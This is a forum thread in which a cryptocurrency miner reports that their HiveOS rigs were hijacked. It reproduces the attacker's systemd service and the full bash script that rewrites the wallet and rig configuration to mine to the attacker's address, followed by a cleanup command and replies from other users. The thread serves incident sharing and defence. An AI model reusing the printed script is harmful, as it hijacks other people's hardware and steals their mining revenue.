Hi,
we are under attack from some idiot(s) using the bad hive security to start a service that changes the flight sheet every 30min…

I changed all passwords and also reinstalled hive with hiveflasher…

I found this just an hour ago so I don´t know if the script/attacker is reproducing itself over the network (previously reinstalled without LAN connection)…

attacker address → 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C

bad service → systemctl status overclock → /lib /systemd /system /overclock.service

/sys /fs /cgroup /unified /system.slice /overclock.service# systemctl status overclock
● overclock.service - Error
Loaded: loaded (/lib /systemd /system /overclock.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2022-01-15 23:13:27 CET; 5h 1min ago
Main PID: 19552 (bash)
Tasks: 57 (limit: 4286)
CGroup: /system.slice/overclock.service
├─ 580 SCREEN -dm -c /hive /etc /screenrc.miner bash
├─ 600 bash /hive /bin /miner-run gminer 1
├─ 628 bash /hive /bin /miner-run gminer 1
├─ 679 ./gminer --algo eth --server eu1.ethermine. org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1. ethermine. org --port 14444 --user
├─ 683 /hive /miners /gminer/ 2.74/ gminer --algo eth --server eu1.ethermine. org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1.ethermine.
├─19552 /bin /bash /usr /bin /nvidia-conf
└─24859 sleep 10m

script used → /usr /bin /nvidia-conf

!/usr/bin/env bash
. /etc/environment
export $(cat /etc /environment | grep -vE ‘^$|^#’ | cut -d= -f1)
loop=2
while [ $loop -le 10 ]
do
if grep -q “0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C” “/hive-config/wallet.conf”; then
echo “ok”
else
sed -i -e"s/^MINER=./MINER=gminer/" /hive-config /rig.conf
sed -i -e"s/^MINER2=./MINER2=/" /hive-config /rig.conf
mv /hive-config /wallet.conf /hive-config /rig-config-example.txt
cat <>/hive-config /wallet.conf

FLIGHT SHEET “Hivepool-ETH-GMiner(Nvidia)”

Miner gminer

GMINER_ALGO=“eth”
GMINER_TEMPLATE=“0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME”
GMINER_HOST=“eu1.ethermine. org
eu1.ethermine. org”
GMINER_PORT=“4444
14444”
GMINER_PASS=“x”
GMINER_TLS=""
GMINER_ALGO2=""
GMINER_TEMPLATE2=""
GMINER_HOST2=""
GMINER_PORT2=""
GMINER_PASS2=""
GMINER_TLS2=""
GMINER_INTENSITY=""
GMINER_USER_CONFIG=’’
GMINER_VER=""

META=’{“gminer”:{“coin”:“ETH”}}’
EOF
dos2unix /hive-config /wallet.conf
dos2unix /hive-config /rig.conf
sleep 30m
/hive /bin /miner restart
fi
/hive /bin /miner start
sleep10m
echo loop restarting
done

I removed the script … let’s see what happens next -.-

has someone had the same problem?

regards

No suspicious activity until now …

Here is my snippet to delete the service and as well the attackers “nvidia-conf”

systemctl stop overclock.service && rm -f /lib/systemd/system/overclock.service && rm -f /usr/bin/nvidia-conf

send this in hive-shell or with send command action

change your passwords with help of hive-security-guide…

Speculating the rigs are assigned routable addresses vs. behind NAT non-routable addressing?

Appreciate you sharing the data. Thanks.

This topic was automatically closed 416 days after the last reply. New replies are no longer allowed.